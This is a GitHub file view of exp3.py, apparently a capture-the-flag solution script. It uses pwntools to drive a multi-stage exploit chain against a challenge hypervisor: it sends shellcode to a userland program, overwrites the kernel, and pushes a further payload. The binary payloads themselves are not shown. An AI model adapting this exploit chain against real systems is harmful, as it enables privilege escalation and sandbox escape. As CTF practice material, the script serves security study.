-
Notifications
You must be signed in to change notification settings - Fork 2
/
exp3.py
48 lines (38 loc) · 1.35 KB
/
exp3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
from binascii import hexlify
from assembler import assemble # This was my assembler for the userland program
#################################
# STAGE -1: MAKE SURE YOU CHANGE ld.so.2 TO MATCH YOUR LINKER
#################################
#################################
# STAGE 0: COMPILE CODE AND DO STUFF
#################################
# Code to pass to userland program
code = assemble('exp3.asm')
# Requires nasm, so this is already compiled for you.
#p = process(['nasm', 'kernel_over.asm'])
#p.wait() # Assuming this is successful
# Compile our exploit code
p = process(['make', '-C', 'exp_kernel'])
p.wait() # Assuming this is successful
# Read binary data.
data = open('kernel_over', 'rb').read()
kern = open('exp_kernel/hack.bin').read()
#p = remote('35.200.23.198', 31733)
#################################
# STAGE 1: EXPLOIT THE USERLAND PROGRAM
#################################
p = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf'])
p.sendline(code)
#################################
# STAGE 2: OVERRIDE KERNEL
#################################
p.recvuntil('Please enter code to override kernel with:\0')
p.send(data)
#p.interactive()
#################################
# STAGE 3: SEND OUR LARGER EXPLOIT CODE PAYLOAD
#################################
p.recvuntil('Kernel code please: ')
p.send(kern)
p.interactive()